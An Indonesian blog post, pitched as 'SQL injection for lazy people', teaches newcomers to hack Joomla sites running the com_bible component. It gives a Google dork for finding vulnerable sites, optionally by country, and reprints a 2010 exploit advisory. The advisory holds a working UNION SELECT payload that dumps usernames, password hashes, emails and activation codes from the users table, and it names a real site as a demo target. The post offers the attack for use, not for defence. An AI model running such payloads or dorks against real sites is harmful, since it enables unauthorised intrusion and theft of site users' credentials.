Cara SQL injection paling mudah

banyak orang yang ingin belajar web hacking mengira SQL injection itu sangatlah susah, kali ini saya akan memberikan cara paling mudah untuk SQL injection atau lebih sering di sebut " SQL injection bagi pemalas " wkwkwkwk.
coba bayangkan, saking mudahnya sampai di sebut bagi Pemalas,hihihi


sebelumnya saya mohon maaf kepada para master karena info ini sangatlah jadul, namun saya hanya ingin berbagi, kepada newbie2 seperti saya ini,

info yang ingin saya share kali ini adalah menyangkut ttg " SQL Injection joomla exploit vulnerability"


oke, tanpa basa basi lagi,
contoh exploit pada : com_bible .
oke,
langkah pertama yang kita lakukan mencari sebuah web yang kita duga bisa kita inject.
buka http://google.com kemudian ketikkan inurl:"/index.php?option=com_bible"
nah, jika kita menginginkan untuk hack suatu web dari negara tertentu, maka tambahkan site:[jenis domain suatu negara]
inurl:"/index.php?option=com_bible" kemudian tekan enter
setelah itu kita akan di bawa keu sebuah halaman yang menampilkan web2 terkandung component bible pada joomla,
pilih salah satu web nya,

nah, sekarang saya akan memberikan bentuk contoh exploitnya:



[!] ===========================================================================[!]

[~] Joomla com_bible SQL Injection vulnerability
[~] Author : r3m1ck (mick.emo.boy@yahoo.com)
[~] Homepage : http://www.indonesiancoder.com , http://r3m1ck.us
[~] Date : 31 May, 2010
[~] location : Indonesia
[~] Dork : aura_kasih=p~

[!]===========================================================================[!]

[ Vulnerable File ]

http://site/index.php?option=com_bible&book=1&chapter=[INDONESIANCODER]

[ XpL ]

/index.php?option=com_bible&book=1&chapter=-50/**/UNION/**/SELECT/**/1,2,group_concat(username,03a,password,03a,email,03a,activation,03c62723e),4,5/**/FROM/**/mos_users

or

another columns

[ d3m0 ]

http://www.throughfaith.org//index.php?o...s_users

etc etc etc ;]

[!]===========================================================================[!]

Penulis : planet-kernel ~ Sebuah blog yang menyediakan berbagai macam informasi

Artikel Cara SQL injection paling mudah ini dipublish oleh planet-kernel pada hari . Semoga artikel ini dapat bermanfaat.Terimakasih atas kunjungan Anda silahkan tinggalkan komentar.sudah ada 0 komentar: di postingan Cara SQL injection paling mudah
 

0 komentar:

Posting Komentar